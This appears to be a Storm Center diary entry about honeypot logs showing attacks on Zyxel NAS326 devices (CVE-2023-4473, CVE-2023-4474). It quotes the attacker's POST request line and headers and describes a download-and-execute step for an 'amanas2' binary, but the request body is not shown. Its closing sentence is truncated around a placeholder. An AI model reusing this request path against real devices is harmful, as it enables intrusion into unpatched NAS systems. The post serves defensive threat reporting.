Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474

Published: 2024-04-30
Last Updated: 2024-04-30 15:19:40 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Yesterday, I talked about attacks against a relatively recent D-Link NAS vulnerability. Today, scanning my honeypot logs, I found an odd URL that I didn't recognize. The vulnerability is a bit older but turns out to be targeting yet another NAS.

The sample request:

POST /cmd,/ck6fup6/portal_main/pkg_init_cmd/register_main/setCookie HTTP/1.0
User-Agent: Baidu
Accept: */*
Content-Length: 73
Content-Type: application/x-www-form-urlencoded
Host: [redacted]


The exploit is simple: attempt to download and execute the "amanas2" binary and execute it. Sadly, I was not able to retrieve the file. Virustotal does show the URL as malicious for a couple of anti-malware tools [1]

Oddly, I am seeing this pattern only the last couple days, even though the vulnerability and the PoC were disclosed last year [2]:

Date Count
April 27th 56
April 28th 1530
April 29th 899
April 30th 749

Based on our logs, only one IP address exploits the vulnerability: %%ip: The IP started scanning a couple of days earlier for index pages and ", likely attempting to exploit a deserialization vulnerability in jeecgFormDemoController 



Johannes B. Ullrich, Ph.D. , Dean of Research,

Keywords: nas zyxel
0 comment(s)


Diary Archives